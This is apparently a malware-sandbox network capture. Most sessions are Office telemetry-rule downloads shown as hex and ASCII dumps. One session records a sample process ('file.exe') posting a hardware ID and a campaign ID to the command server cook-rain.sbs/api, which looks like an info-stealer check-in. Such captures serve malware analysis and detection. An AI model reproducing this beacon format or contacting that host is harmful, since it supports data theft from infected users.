                                                                                                                                                                                                            X-ARC-SIG: lWXB7101MTw1Leg6HsO8UaD6vLpiNjedaTGBVTZTUxCpIi3B8N7TVcYe/b2EMNFoBk2JzLbZL53bSeRYKQ6KRzbD84jLLQ0xxEOeCqPQOUaJoE+VwQDSeG26QLVL9QyMC61gfgi4ZDlnYDX+PCyEdDU57qQGMYn0ThJt985QCg6RQ2oFuvZS2bSB7DbBAplb6nz71UZR4aB42lItPG3m41MOuvN8g/GlUrqUu28tEe6ekez8A+5cpZ/rzkQjEo7gYLv0LbnvGgZb+d+qL7TMlX0ONhyiF0Mqmz839gZGqU8Oi5d26d/tO0VhCgJzm3C0boMrrwBN3GN/vKQ1rRdN6g==
                                                                                                                                                                                                            Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:13 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC2939INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                                                                                                                                                            Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            9192.168.2.64971913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:14 GMT
                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                            Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
                                                                                                                                                                                                            ETag: "0x8DD08B87243495C"
                                                                                                                                                                                                            x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141714Z-1777c6cb754dqb2khC1TEBmk1s0000000b2000000000mkmd
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.649720188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ERW3R0OC80GPO8
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 12841
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:15 UTC12841OUTData Raw: 2d 2d 45 52 57 33 52 30 4f 43 38 30 47 50 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 35 34 32 45 37 33 34 39 32 46 45 32 41 43 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 45 52 57 33 52 30 4f 43 38 30 47 50 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 52 57 33 52 30 4f 43 38 30 47 50 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 52
                                                                                                                                                                                                            Data Ascii: --ERW3R0OC80GPO8Content-Disposition: form-data; name="hwid"12542E73492FE2AC4AFF5ADEC9E6BD77--ERW3R0OC80GPO8Content-Disposition: form-data; name="pid"2--ERW3R0OC80GPO8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ER
                                                                                                                                                                                                            2024-11-21 14:17:16 UTC990INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:16 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=68rbe2voijk0em3u6sd1jabn67; expires=Mon, 17-Mar-2025 08:03:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8MZvgmj%2Ffyb2NfM25wtS7znbb8gysWmd5JZxoW6j0hE9ANj%2FPAZtS7QdpLUHDn%2BrDHO%2Fnk7h1NWA209WZrEAwJQB9KUT6D95HCr%2FcEGpgwG5edEktS1ZYIMGWVx4%2Fhk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614d61df831a28-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13774&delivery_rate=1427872&cwnd=138&unsent_bytes=0&cid=45a0dde8030b5b81&ts=891&x=0"
                                                                                                                                                                                                            2024-11-21 14:17:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-21 14:17:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            11192.168.2.64972113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                            x-ms-request-id: d37f37b1-d01e-002b-586c-3b25fb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141717Z-1777c6cb754rz2pghC1TEBghen0000000b3g00000000ake4
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            12192.168.2.64972413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                            x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141717Z-178bfbc474b9fdhphC1NYCac0n00000001dg00000000rap3
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
